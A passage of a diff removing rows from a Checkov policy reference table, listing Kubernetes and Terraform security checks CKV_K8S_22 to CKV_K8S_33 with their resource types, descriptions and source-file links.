[ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2651 | CKV_K8S_22 | resource | Job | Use read-only filesystem for containers where possible | Kubernetes | 
[ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2652 | CKV_K8S_22 | resource | Pod | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2653 | CKV_K8S_22 | resource | PodTemplate | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2654 | CKV_K8S_22 | resource | ReplicaSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2655 | CKV_K8S_22 | resource | ReplicationController | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2656 | CKV_K8S_22 | resource | StatefulSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2657 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2658 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2659 | 
CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2660 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2661 | CKV_K8S_23 | resource | CronJob | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2662 | CKV_K8S_23 | resource | DaemonSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2663 | CKV_K8S_23 | resource | Deployment | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2664 | CKV_K8S_23 | resource | Job | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2665 | CKV_K8S_23 | resource | Pod | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2666 | CKV_K8S_23 | resource | ReplicaSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2667 | CKV_K8S_23 | resource | ReplicationController | Minimize the 
admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2668 | CKV_K8S_23 | resource | StatefulSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2669 | CKV_K8S_24 | resource | PodSecurityPolicy | Do not allow containers with added capability | Kubernetes | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesPSP.py) | -| 2670 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) | -| 2671 | CKV_K8S_25 | resource | CronJob | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2672 | CKV_K8S_25 | resource | DaemonSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2673 | CKV_K8S_25 | resource | Deployment | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2674 | CKV_K8S_25 | resource | DeploymentConfig | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 
2675 | CKV_K8S_25 | resource | Job | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2676 | CKV_K8S_25 | resource | Pod | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2677 | CKV_K8S_25 | resource | PodTemplate | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2678 | CKV_K8S_25 | resource | ReplicaSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2679 | CKV_K8S_25 | resource | ReplicationController | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2680 | CKV_K8S_25 | resource | StatefulSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2681 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2682 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | 
[AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2683 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2684 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2685 | CKV_K8S_26 | resource | CronJob | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2686 | CKV_K8S_26 | resource | DaemonSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2687 | CKV_K8S_26 | resource | Deployment | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2688 | CKV_K8S_26 | resource | DeploymentConfig | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2689 | CKV_K8S_26 | resource | Job | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2690 | CKV_K8S_26 | resource | Pod | Do not specify hostPort unless absolutely necessary | Kubernetes | 
[HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2691 | CKV_K8S_26 | resource | PodTemplate | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2692 | CKV_K8S_26 | resource | ReplicaSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2693 | CKV_K8S_26 | resource | ReplicationController | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2694 | CKV_K8S_26 | resource | StatefulSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2695 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2696 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2697 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2698 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | 
[HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2699 | CKV_K8S_27 | resource | CronJob | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2700 | CKV_K8S_27 | resource | DaemonSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2701 | CKV_K8S_27 | resource | Deployment | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2702 | CKV_K8S_27 | resource | Job | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2703 | CKV_K8S_27 | resource | Pod | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2704 | CKV_K8S_27 | resource | ReplicaSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2705 | CKV_K8S_27 | resource | ReplicationController | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2706 | CKV_K8S_27 | resource | StatefulSet | Do not expose the docker daemon socket to containers | 
Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2707 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2708 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2709 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2710 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2711 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2712 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2713 | CKV_K8S_28 | resource | CronJob | Minimize the admission of containers with the NET_RAW capability | Kubernetes | 
[DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2714 | CKV_K8S_28 | resource | DaemonSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2715 | CKV_K8S_28 | resource | Deployment | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2716 | CKV_K8S_28 | resource | DeploymentConfig | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2717 | CKV_K8S_28 | resource | Job | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2718 | CKV_K8S_28 | resource | Pod | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2719 | CKV_K8S_28 | resource | PodTemplate | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2720 | CKV_K8S_28 | resource | ReplicaSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2721 | CKV_K8S_28 | resource | ReplicationController | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2722 | CKV_K8S_28 | resource | StatefulSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) |
-| 2723 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 2724 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 2725 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 2726 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 2727 | CKV_K8S_29 | resource | CronJob | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
-| 2728 | CKV_K8S_29 | resource | DaemonSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
-| 2729 | CKV_K8S_29 | resource | Deployment | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
-| 2730 | CKV_K8S_29 | resource | Job | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
-| 2731 | CKV_K8S_29 | resource | Pod | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
-| 2732 | CKV_K8S_29 | resource | ReplicaSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
-| 2733 | CKV_K8S_29 | resource | ReplicationController | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
-| 2734 | CKV_K8S_29 | resource | StatefulSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) |
-| 2735 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 2736 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 2737 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 2738 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 2739 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 2740 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 2741 | CKV_K8S_30 | resource | CronJob | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2742 | CKV_K8S_30 | resource | DaemonSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2743 | CKV_K8S_30 | resource | Deployment | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2744 | CKV_K8S_30 | resource | DeploymentConfig | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2745 | CKV_K8S_30 | resource | Job | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2746 | CKV_K8S_30 | resource | Pod | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2747 | CKV_K8S_30 | resource | PodTemplate | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2748 | CKV_K8S_30 | resource | ReplicaSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2749 | CKV_K8S_30 | resource | ReplicationController | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2750 | CKV_K8S_30 | resource | StatefulSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) |
-| 2751 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 2752 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 2753 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 2754 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 2755 | CKV_K8S_31 | resource | CronJob | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
-| 2756 | CKV_K8S_31 | resource | DaemonSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
-| 2757 | CKV_K8S_31 | resource | Deployment | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
-| 2758 | CKV_K8S_31 | resource | Job | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
-| 2759 | CKV_K8S_31 | resource | Pod | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
-| 2760 | CKV_K8S_31 | resource | ReplicaSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
-| 2761 | CKV_K8S_31 | resource | ReplicationController | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
-| 2762 | CKV_K8S_31 | resource | StatefulSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) |
-| 2763 | CKV_K8S_32 | resource | PodSecurityPolicy | Ensure default seccomp profile set to docker/default or runtime/default | Kubernetes | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py) |
-| 2764 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) |
-| 2765 | CKV_K8S_33 | resource | CronJob | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2766 | CKV_K8S_33 | resource | DaemonSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2767 | CKV_K8S_33 | resource | Deployment | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2768 | CKV_K8S_33 | resource | DeploymentConfig | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2769 | CKV_K8S_33 | resource | Job | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2770 | CKV_K8S_33 | resource | Pod | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2771 | CKV_K8S_33 | resource | PodTemplate | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2772 | CKV_K8S_33 | resource | ReplicaSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2773 | CKV_K8S_33 | resource | ReplicationController | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
-| 2774 | CKV_K8S_33 | resource | StatefulSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) |
